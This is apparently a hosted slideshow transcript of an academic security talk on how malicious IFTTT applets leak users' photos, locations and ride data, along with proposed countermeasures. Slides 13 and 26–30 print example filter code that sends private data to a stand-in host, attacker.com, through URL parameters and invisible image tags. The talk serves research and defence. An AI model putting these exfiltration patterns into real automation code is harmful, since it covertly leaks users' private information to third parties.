breaking and fixing iot apps
play

Breaking and Fixing IoT Apps Andrei Sabelfeld Joint work with Iulia - PowerPoint PPT Presentation

Oct 21, 2022 •168 likes •661 views

Breaking and Fixing IoT Apps Andrei Sabelfeld Joint work with Iulia Bastys and Musard Balliu Appeared in CCS18 Web of Things Internet of Things (IoT) Incompatible standards, platforms, technologies World Wide Web Consortium (W3C)

  1. Breaking and Fixing IoT Apps Andrei Sabelfeld Joint work with Iulia Bastys and Musard Balliu Appeared in CCS’18

  2. Web of Things Internet of Things (IoT) • Incompatible standards, platforms, technologies “World Wide Web Consortium (W3C) is in a unique position to create the royalty-free and platform-independent standards needed to overcome the fragmentation of the IoT” -W3C CEO Dr. Jeff Jaffe, 2017 Security implications?

  3. IoT apps “Connecting otherwise unconnected services”

  4. IoT apps • “Managing users’ digital lives” • Smart homes, smartphones, cars, fitness armbands • Online services (Google, Dropbox,…) • Social networks (Facebook, Twitter,…) • End-user programming • Anyone can create and publish apps • Most apps by third parties • Web interface + smartphone clients

  5. IFTTT “If This Then That” • Trigger-action programming • Largest IoT app platform • Over 500 integrated services • Millions of users and billions of running apps

  6. IFTTT app If this then that Action Trigger What can go wrong? J

  7. Attack by malicious app maker then If

  8. IFTTT app If this then that Action Trigger What can go wrong? J

  9. Attack by malicious app maker then If

  10. IFTTT’s access control If this then that Action Trigger JavaScript Users explicitly “sandboxed” grant the app access

  11. URLs as universal glue “Connecting otherwise unconnected services” If this then that Trigger Action 3. Pass URL to 1.Upload new Google Drive API image file to IFTTT for upload to Google 2. Put up image under public URL on ifttt.com

  12. How to exfiltrate secrets? • Private information available via APIs • Private sources: Location, voice commands, images,… • Cannot directly exfiltrate from filter code • Public sinks? • Batch job programs with no I/O • “Can load the gun but not pull the trigger….”

  13. URL attacks • “Load the gun and let somebody else pull the trigger” • URL upload attack • PhotoURL • 'https://attacker.com?'+encodeURIComponent(PhotoURL) • URL markup attack • Include an invisible image • ’<img src=\"https://attacker.com?’ + secret + '\" style=\"width:0px;height:0px;\">’

  14. URL upload attack demo

  15. URL markup attack demo

  16. 3 rd -party applet attack surface Integrity & then availability … If Privacy

  17. Empirical measurement study • Dataset by Mi et al. (May 2017) • 279,828 IFTTT app data: triggers and actions used • Classification of triggers and actions • Privacy, Integrity & Availability • Per category • Classification of applets • Private sources & public sink potential privacy violation • High integrity sink potential integrity violation • Possibility of skipping trigger potential denial of service • 30% of apps potentially vulnerable

  18. time management & tracking voice assistants task management & to-dos tags & beacons Private Available Public survey tools social networks smart hubs & systems security & monitoring systems power monitoring & management shopping photo & video noti fi cations news & information notes mobile devices & accessories music journaling & personal data location health & fi tness environment control & monitoring fi nance & payments email diy electronics IFTTT triggers developer tools contacts connected car communication calendars & scheduling cloud storage business tools bookmarking blogging appliances 200 150 100 50 0 Number of triggers per category

  19. IFTTT actions Cumulative number of actions per category Public 180 Untrusted 160 Available 140 120 100 80 60 40 20 0 appliances blogging bookmarking business tools calendars & scheduling cloud storage communication connected car contacts developer tools diy electronics email environment control & monitoring gardening health & fi tness journaling & personal data lighting mobile devices & accessories music news & information notes noti fi cations pet trackers photo & video power monitoring & management routers & computer accessories security & monitoring systems shopping smart hubs & systems social networks survey tools task management & to-dos time management & tracking television & cable tags & beacons

  20. 1000 voice assistants Potential privacy violations time management & tracking task management & to-dos tags & beacons survey tools social networks smart hubs & systems 800 shopping security & monitoring systems routers & computer accessories power monitoring & management photo & video noti fi cations notes 600 news & information music mobile devices & accessories location lighting journaling & personal data health & fi tness fi nance & payments 400 environment control & monitoring email education diy electronics developer tools contacts connected car 200 communication cloud storage calendars & scheduling business tools bookmarking blogging appliances 0 appliances blogging bookmarking business tools calendars & scheduling cloud storage communication connected car contacts developer tools diy electronics education email environment control & monitoring fi nance & payments health & fi tness journaling & personal data lighting location mobile devices & accessories music news & information notes noti fi cations photo & video power monitoring & management routers & computer accessories security & monitoring systems shopping smart hubs & systems social networks survey tools tags & beacons task management & to-dos time management & tracking voice assistants

  21. URL shortening attack demo

  22. Countermeasures: break the flow • Per-app access control • Public app: no private sources • Private app: no public sinks • Cannot build URLs from strings, only via APIs • Output sanitization • Authenticated communication • Protect resources on CDNs by requiring authentication • If public URLs can’t be avoided • Shorten URL lifetime; already done by some CDNs • Secure URL shortening: 11-12 chars best practice

  23. Public app then If

  24. Private app then If

  25. Countermeasures: track the flow • Track information flow in JavaScript code then • Allow flow from public sources If to attacker • Logo image with public URL JSFlow • Block flow from private sources to attacker • Location leaks prevented • JSFlow • Information flow tracker for JavaScript • ECMA-262 v.5 support • jsflow.net

  26. Types of flow: explicit Automatically back up your new iOS photos to Google Drive APPLET TITLE Any new photo TRIGGER FILTER & TRANSFORM var publicPhotoURL = encodeURIComponent(IosPhotos.newPhotoInCameraRoll.PublicPhotoURL); var attack = ‘www.attacker.com?’ + publicPhotoURL; GoogleDrive.uploadFileFromUrlGoogleDrive.setUrl(attack); Upload file from URL ACTION 26

  27. Types of flow: explicit Automatically back up your new iOS photos to Google Drive APPLET TITLE Any new photo TRIGGER FILTER & TRANSFORM var publicPhotoURL = encodeURIComponent(IosPhotos.newPhotoInCameraRoll.PublicPhotoURL); var attack = ‘www.attacker.com?’ + publicPhotoURL; GoogleDrive.uploadFileFromUrlGoogleDrive.setUrl(attack); Upload file from URL ACTION 27

  28. Types of flow: explicit Automatically get an email every time you park your BMW with a map APPLET TITLE Car is parked TRIGGER FILTER & TRANSFORM var loc = encodeURIComponent(Location.enterOrExitRegionLocation.LocationMapUrl); var locImg = ‘<img src=\”’ + Location.enterOrExitRegionLocation.LocationMapUrl + ‘\”>’; var attack = ‘<img src=\”www.attacker.com?’ + loc + ‘\” style=\” width:0px; height:0px; \”>’; var iftttLogo = ‘<img src=\”www.ifttt.com/logo.png” style=\” width:100px; height:100px; \”>’; Email.sendMeEmail.setBody(‘I ‘ + Location.enterOrExitRegionLocation.EnteredOrExited + ‘ an area ’ + locImg + iftttLogo + attack); Send me an email ACTION 28

  29. Types of flow: explicit Automatically get an email every time you park your BMW with a map APPLET TITLE Car is parked TRIGGER FILTER & TRANSFORM var loc = encodeURIComponent(Location.enterOrExitRegionLocation.LocationMapUrl); var locImg = ‘<img src=\”’ + Location.enterOrExitRegionLocation.LocationMapUrl + ‘\”>’; var attack = ‘<img src=\”www.attacker.com?’ + loc + ‘\” style=\” width:0px; height:0px; \”>’; var iftttLogo = ‘<img src=\”www.ifttt.com/logo.png” style=\” width:100px; height:100px; \”>’; Email.sendMeEmail.setBody(‘I ‘ + Location.enterOrExitRegionLocation.EnteredOrExited + ‘ an area ’ + locImg + iftttLogo + attack); Send me an email ACTION 29

  30. Types of flow: implicit Log your completed rides in Google Calendar APPLET TITLE Ride completed TRIGGER FILTER & TRANSFORM var rideMap = Uber.rideCompleted.TripMapImage; var driver = Uber.rideCompleted.DriverName; for (i = 0; i < driver.length; i++) for (j = 32; j < 127; j++){ t = driver[i] == String.fromCharCode(j); if (t) { dst[i] = String.fromCharCode(j); } } var attack = ‘<img src=\”www.attacker.com?’ + dst + ‘\” style=\” width:0px; height:0px; \”>’; GoogleCalendar.quickAddEvent.setQuickAdd(rideMap + attack); Quick add event ACTION 30

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Breaking and Fixing VoLTE: Exploiting Hidden Data Channels and Mis-implementations Hongil Kim* ,

Breaking and Fixing VoLTE: Exploiting Hidden Data Channels and Mis-implementations Hongil Kim* ,

Breaking and Fixing VoLTE: Exploiting Hidden Data Channels and Mis-implementations Hongil Kim* , Dongkwan Kim* , Minhee Kwon, Hyeongseok Han, Yeongjin Jang, Taesoo Kim, Dongsu Han, Yongdae Kim 1 VoLTE = Voice over LTE 4G LTE: All-IP based

1.16k views • 113 slides
Breaking and Fixing Public-Key Kerberos Iliano Cervesato - Tulane University (Joint work with

Breaking and Fixing Public-Key Kerberos Iliano Cervesato - Tulane University (Joint work with

Breaking and Fixing Public-Key Kerberos Iliano Cervesato - Tulane University (Joint work with A. D. Jaggard, A. Scedrov, J.-K. Tsay, and C. Walstad) Partially supported by ONR and NSF Information and Software Engineering Department 30

278 views • 26 slides
Cure My FEVER: Building, Breaking, and Fixing Models for Fact-Checking Christopher Hidey Tuhin

Cure My FEVER: Building, Breaking, and Fixing Models for Fact-Checking Christopher Hidey Tuhin

Cure My FEVER: Building, Breaking, and Fixing Models for Fact-Checking Christopher Hidey Tuhin Chakrabarty Tariq Alhindi Siddharth Varia Kriste Krstovski Mona Diab Smaranda Muresan Automated Fact-checking and Related Tasks Source

382 views • 36 slides
Fixing The Internet Of Sh*t a.k.a. How to design secure web apps A presentation by Greg

Fixing The Internet Of Sh*t a.k.a. How to design secure web apps A presentation by Greg

Fixing The Internet Of Sh*t a.k.a. How to design secure web apps A presentation by Greg Slepak at Greg Slepak @taoeffect okTurtles GroupIncome Espionage What Is The Internet of ? The Internet of ? Source:

814 views • 69 slides
Small Business Apps WHAT ARE MOBI LE APPS ? W h a t are mob i le apps ? A little bit of

Small Business Apps WHAT ARE MOBI LE APPS ? W h a t are mob i le apps ? A little bit of

WELCOME Small Business Apps WHAT ARE MOBI LE APPS ? W h a t are mob i le apps ? A little bit of information An App is a piece of so ware (a program) that needs to be installed on Mobile Apps are device specific, meaning that an App that runs

268 views • 12 slides
Boxing them in Buggy apps can crash other apps The Kernel App 1 App 2 App 3 Buggy apps can

Boxing them in Buggy apps can crash other apps The Kernel App 1 App 2 App 3 Buggy apps can

Boxing them in Buggy apps can crash other apps The Kernel App 1 App 2 App 3 Buggy apps can crash OS wants to be your friend Buggy apps can hog all resources Operating System Malicious apps can violate Reading and writing memory, privacy

548 views • 17 slides
Mobile Apps for Ground Breaking Library Services Ayodele John Alonge Kennet h Dike Library,

Mobile Apps for Ground Breaking Library Services Ayodele John Alonge Kennet h Dike Library,

Mobile Apps for Ground Breaking Library Services Ayodele John Alonge Kennet h Dike Library, Universit y of Ibadan Outline What is t he Mobile App? What are t he benefit s of t he Mobile App? What are some mobile library

426 views • 18 slides
F ROM WEBSITES TO APPS , AND NOW FROM APPS TO CHATBOTS ? A NTNIO B RANCO FROM APPS TO CHATBOTS

F ROM WEBSITES TO APPS , AND NOW FROM APPS TO CHATBOTS ? A NTNIO B RANCO FROM APPS TO CHATBOTS

F ROM WEBSITES TO APPS , AND NOW FROM APPS TO CHATBOTS ? A NTNIO B RANCO FROM APPS TO CHATBOTS CEO of large social network in annual development conference 2 months ago Shared vision for next 2 decades: past : with advent of PCs, companies

498 views • 14 slides
The Kernel wants to be your friend Boxing them in Buggy apps can crash other apps App 1 App 2

The Kernel wants to be your friend Boxing them in Buggy apps can crash other apps App 1 App 2

The Kernel wants to be your friend Boxing them in Buggy apps can crash other apps App 1 App 2 App 3 Buggy apps can crash OS Buggy apps can hog all resources Operating System Malicious apps can violate Reading and writing memory, privacy

1.15k views • 67 slides
Breaking out of the box Understanding rela5onships between learning and assessment Breaking

Breaking out of the box Understanding rela5onships between learning and assessment Breaking

Dr Nick Saville Breaking out of the box Understanding rela5onships between learning and assessment Breaking out of the box - a metaphor for thinking about rela5onships and interpreta5ons breaking out breaking out of the box of the

895 views • 68 slides
Breaking for Commercials: Characterizing Mobile Advertising Yejin Li Electrical and Computer

Breaking for Commercials: Characterizing Mobile Advertising Yejin Li Electrical and Computer

Breaking for Commercials: Characterizing Mobile Advertising Yejin Li Electrical and Computer Engineering Dept. Worcester Polytechnic Institute (WPI) Mobile Phone Advertising FREE Apps always come with different ads, which can be really annoying

551 views • 17 slides
By: Taylor Thomas &amp; Ashley Fischer There are apps for just about EVERYTHING! There are

By: Taylor Thomas &amp; Ashley Fischer There are apps for just about EVERYTHING! There are

By: Taylor Thomas &amp; Ashley Fischer There are apps for just about EVERYTHING! There are new apps being developed and posted everyday. Some of the best apps you will ever find are FREE! There are two ways to download apps for

606 views • 38 slides
Building your future Who thinks the world needs fixing? Who wants to be a part of fixing the

Building your future Who thinks the world needs fixing? Who wants to be a part of fixing the

Building your future Who thinks the world needs fixing? Who wants to be a part of fixing the world? Building the solutions is where the future will be made Math is essential to building these solutions You are getting ready to make some

440 views • 16 slides
DEBUGGING LESSONS LEARNED WHILE DEBUGGING LESSONS LEARNED WHILE FIXING NETBSD FIXING NETBSD

DEBUGGING LESSONS LEARNED WHILE DEBUGGING LESSONS LEARNED WHILE FIXING NETBSD FIXING NETBSD

DEBUGGING LESSONS LEARNED WHILE DEBUGGING LESSONS LEARNED WHILE FIXING NETBSD FIXING NETBSD ABOUT ME ABOUT ME maya@NetBSD.org coypu@sdf.org NetBSD/pkgsrc for the last 3 years THIS TALK THIS TALK Mix of a bunch of bugs Not solo work

695 views • 31 slides
Adaptive Progressive Web Apps PWA Progressive Web Apps are just great websites that can behave

Adaptive Progressive Web Apps PWA Progressive Web Apps are just great websites that can behave

Adaptive Progressive Web Apps PWA Progressive Web Apps are just great websites that can behave like native apps Progressive Web Apps are just great apps, powered by Web technologies and delivered with Web infrastructure.

454 views • 32 slides
2015-16 Results: Thank You! Goal = 415,000 apps Actual = 427,695 apps $30,000 in

2015-16 Results: Thank You! Goal = 415,000 apps Actual = 427,695 apps $30,000 in

More Than a Meal Campaign 2016-17 Two applications, one deadline, many student resources 2015-16 Results: Thank You! Goal = 415,000 apps Actual = 427,695 apps $30,000 in recognition awards $60M/3 yrs in new revenue to the

345 views • 10 slides
OMWeb - Virtual Web-based Remote Library for Modelica in Engineering Courses Presenter: Mohsen

OMWeb - Virtual Web-based Remote Library for Modelica in Engineering Courses Presenter: Mohsen

OMWeb - Virtual Web-based Remote Library for Modelica in Engineering Courses Presenter: Mohsen Torabzadeh-Tari S lides: Zoheb Muhhamed Hossain PELAB, Linkping University, S weden OMWeb - Introduction OMWeb is a Web interface for

370 views • 13 slides
Showing your applet on a webpage 1 11/22/2013 Steps Find the build folder inside your

Showing your applet on a webpage 1 11/22/2013 Steps Find the build folder inside your

11/22/2013 CSCI-1101B Lab Java Topics Applet on webpage Interface GUI Mohammad T . Irfan 11/22/13 Showing your applet on a webpage 1 11/22/2013 Steps Find the build folder inside your project folder You will see An html

450 views • 8 slides
Java AWT CS2704: Object-Oriented Software Design and Construction Constantinos Phanouriou

Java AWT CS2704: Object-Oriented Software Design and Construction Constantinos Phanouriou

Java AWT CS2704: Object-Oriented Software Design and Construction Constantinos Phanouriou Department of Computer Science Virginia Tech CS2704 (Spring 2000) 1 Abstract Windowing Toolkit (AWT) AWT classes form 3 categories: Graphics

548 views • 18 slides
A Load Time Policy Checker for Open Multi-Application Smart Cards Nicola Dragoni 1 Eduardo Lostal

A Load Time Policy Checker for Open Multi-Application Smart Cards Nicola Dragoni 1 Eduardo Lostal

A Load Time Policy Checker for Open Multi-Application Smart Cards Nicola Dragoni 1 Eduardo Lostal 1 Olga Gadyatskaya 2 Fabio Massacci 2 Federica Paci 2 1 Technical University of Denmark, 2 University of Trento POLICY-2011, June 6-8, 2011 Agenda

536 views • 18 slides
IS311 Programming Concepts Abstract Window Toolkit (part 1: Drawing Simple Graphics) 2

IS311 Programming Concepts Abstract Window Toolkit (part 1: Drawing Simple Graphics) 2

1 IS311 Programming Concepts Abstract Window Toolkit (part 1: Drawing Simple Graphics) 2 Abstract Window Toolkit The Abstract Window Toolkit (AWT) package contains all the classes for creating user interfaces and for painting graphics

757 views • 72 slides
CS6220: DATA MINING TECHNIQUES Matrix Data: Clustering: Part 2 Instructor: Yizhou Sun

CS6220: DATA MINING TECHNIQUES Matrix Data: Clustering: Part 2 Instructor: Yizhou Sun

CS6220: DATA MINING TECHNIQUES Matrix Data: Clustering: Part 2 Instructor: Yizhou Sun yzsun@ccs.neu.edu October 19, 2014 Methods to Learn Matrix Data Set Data Sequence Time Series Graph &amp; Data Network Classification Decision Tree;

1k views • 41 slides
TORNADOES IN 2017 HTTPS://WWW.STATCRUNCH.COM/APP/INDEX.PHP?DATAID=2822127 Data Source:

TORNADOES IN 2017 HTTPS://WWW.STATCRUNCH.COM/APP/INDEX.PHP?DATAID=2822127 Data Source:

TORNADOES IN 2017 HTTPS://WWW.STATCRUNCH.COM/APP/INDEX.PHP?DATAID=2822127 Data Source: https://www.ncdc.noaa.gov/stormevents/choosedates.jsp?statefips=-999%2CALL TO TORNADO RNADO DATA A HTTPS://WWW.SPC.NOAA.GOV/WCM/#DATA MyLab Problem

553 views • 24 slides
Manipulating the Frame Information With an Underflow Attack Emilie FAUGERON - CARDIS 2013

Manipulating the Frame Information With an Underflow Attack Emilie FAUGERON - CARDIS 2013

Manipulating the Frame Information With an Underflow Attack Emilie FAUGERON - CARDIS 2013 emilie.faugeron@thalesgroup.com Thales Communications &amp; Security Table of Contents 2 / 2 Overview Byte code verification of the Underflow

474 views • 45 slides

More recommend